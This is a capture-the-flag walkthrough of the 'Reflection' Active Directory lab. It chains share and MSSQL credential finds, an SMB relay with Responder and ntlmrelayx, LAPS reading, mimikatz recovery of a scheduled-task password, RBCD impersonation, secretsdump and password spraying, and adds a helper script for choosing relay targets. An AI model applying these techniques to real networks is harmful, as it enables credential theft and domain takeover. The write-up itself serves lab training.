🪞Reflection

You will learn about relay attacks and different flavours of exploiting a commonly misconfigured ACL (GenericAll)

Enumeration

IPs

10.10.241.21 dc01.reflection.vl
10.10.241.22 ms01.reflection.vl
10.10.241.23 ws01.reflection.vl

Enumerating SMB shares, we find a custom one on MS01

Inside we find a configuration file

We find credentials, probably for a user called web_staging

The credentials work for MSSQL on MS01

Unfortunately we cannot enable xp_cmdshell (that needs sysadmin, which this user doesn't have)

We enumerate the databases

We find a users table

Inside there are credentials

SMB Relay

We can try to capture an NTLMv2 hash from the MSSQL service on MS01 by coercing it to authenticate to our host

We cannot pass the hash (NetNTLMv2 is a challenge-response, not a reusable NT hash), but we can relay it to other machines in the domain where SMB signing is not required

It's possible to check this in the Nmap script scan of the SMB server (smb2-security-mode: "enabled but not required"), or with CME, which prints (signing:False) in the host banner

First we need to disable the SMB and HTTP listeners in the Responder configuration (/etc/responder/Responder.conf), so they don't clash with ntlmrelayx on ports 445 and 80

Then we run ntlmrelayx with the DC as the target and relay the captured authentication to it

With -i it spawns an interactive SMB client shell, reachable on 127.0.0.1:11000 (e.g. with nc)
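Two things to get right before the relay, as an added example (this is not code from the original writeup): picking relay targets from the signing check, and switching off the Responder listeners that would otherwise fight ntlmrelayx for the ports. The CME output and the Responder.conf excerpt are constructed samples reusing the page's IPs, not the lab's real output. Note the exclusion of the coerced host itself: relaying NTLM back to the machine it came from has been blocked since MS08-068, so MS01 (the MSSQL server we coerce) is never a valid target even if it does not require signing.

```python
"""Relay-target selection and Responder listener cleanup for an SMB relay.

Added example, not from the original writeup. CME_OUTPUT and RESPONDER_CONF
are constructed samples; the IPs reuse the page's hosts file.
"""
import re

# Constructed sample of `crackmapexec smb 10.10.241.0/24` banner lines.
CME_OUTPUT = """\
SMB         10.10.241.21    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.241.22    445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.241.23    445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:True) (SMBv1:False)
"""

CME_LINE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+(?P<host>\S+)"
    r".*\(signing:(?P<signing>True|False)\)"
)


def relay_targets(cme_output: str, source_ip: str) -> list:
    """Hosts that accept unsigned SMB, minus the host whose auth we coerce.

    The coerced host is excluded: NTLM cannot be relayed back to the machine
    it originated from (reflection has been blocked since MS08-068).
    """
    targets = []
    for line in cme_output.splitlines():
        m = CME_LINE.match(line)
        if m and m["signing"] == "False" and m["ip"] != source_ip:
            targets.append(m["ip"])
    return targets


def targets_file(targets: list) -> str:
    """Contents for `ntlmrelayx.py -tf targets.txt`, one smb:// URL per line."""
    return "".join("smb://%s\n" % ip for ip in targets)


# Constructed excerpt of /etc/responder/Responder.conf ([Responder Core]).
RESPONDER_CONF = """\
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
HTTP = On
HTTPS = On
DNS = On
"""


def listener_state(conf_text: str) -> dict:
    """Map server name -> 'On'/'Off' from the `NAME = On` lines (comments skipped)."""
    state = {}
    for line in conf_text.splitlines():
        if "=" in line and not line.lstrip().startswith(";"):
            key, val = (s.strip() for s in line.split("=", 1))
            state[key] = val
    return state


def disable_listeners(conf_text: str, listeners=("SMB", "HTTP")) -> str:
    """Set the named servers to Off so ntlmrelayx can bind 445 and 80.

    Matching is on the whole key, so HTTPS stays untouched when HTTP is off.
    """
    out = []
    for line in conf_text.splitlines():
        key = line.split("=", 1)[0].strip()
        if "=" in line and key in listeners:
            line = "%s = Off" % key
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # MS01 (10.10.241.22) is the MSSQL host we coerce, so it is the source.
    print(targets_file(relay_targets(CME_OUTPUT, "10.10.241.22")), end="")
    print(disable_listeners(RESPONDER_CONF), end="")
```

With the constructed sample, only DC01 survives the filter (MS01 is the source, WS01 requires signing), which matches the page's choice of the DC as relay target. The corrected conf is what you would write back to Responder.conf before starting Responder alongside `ntlmrelayx.py -tf targets.txt -smb2support -i`.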

Now we see a new share called prod

Inside there is another configuration file, this time with credentials for a web_prod user

With these creds we can log in to MSSQL on the DC

We still cannot enable xp_cmdshell

Enumerating manually, we can see a proddb database with a users table

And we get new credentials

I wanted to create a user list to spray passwords later

We can do that with CME

Remove Guest and krbtgt and the list is complete

Bloodhound abbie.smith

With these credentials we can run bloodhound

Clicking on Shortest Paths from Owned Principals, we can see that Abbie has GenericAll on MS01

This is the attack path that bloodhound suggests

This won't work because the domain's MachineAccountQuota is 0, so this user cannot add a machine account

Shadow Credentials was also suggested by BloodHound, but it won't work because AD CS is not installed, so the DC has no certificate and PKINIT is unavailable

With GenericAll on the computer object we can also read the LAPS password (the ms-Mcs-AdmPwd attribute), if LAPS is enabled on the target

We get the password for the MS01 local Administrator account and can dump the SAM (and, with secretsdump, the LSA secrets, which include the MS01$ machine account hash)

Georgia.Price

After logging in with RDP, I got a notification saying this

So I looked at the scheduled tasks and found a task called backup that starts PowerShell and does an ls

The interesting thing is that the task runs as the user Georgia.Price

To get the user's password we can use mimikatz with this command found on HackTricks (a scheduled task that runs as another user keeps that user's password stored on the host, so it can be recovered)

Now running bloodhound with Georgia.Price

This user has GenericAll on WS01

The MachineAccountQuota is still 0, but this time we already have a machine account, MS01$, whose hash we dumped before

So we don't need to add a new account to abuse Resource-Based Constrained Delegation (RBCD): MS01$ can be the account allowed to delegate to WS01

RBCD

First we check whether delegation is already configured on WS01 (its msDS-AllowedToActOnBehalfOfOtherIdentity attribute) and, if not, we write it so that the machine account MS01$ is allowed to act on behalf of other identities on WS01

Now, authenticating as MS01$, we request a service ticket for WS01 that impersonates the Administrator user (S4U2self followed by S4U2proxy)

Now we dump WS01 with that ticket and find a plaintext password for Rhys.Garner (secretsdump also returns the LSA secrets, which is where a plaintext password shows up)

To get the flag: WinRM is not enabled because WS01 is a workstation, and psexec.py cannot be used either since Defender is on

So use CME (it takes its sweet time) or atexec.py

Password spraying

I ran bloodhound again but nothing useful came up with this user

So I tried spraying the password across the user list

And it worked!

P.S.

xct Kali setup on top 🔥
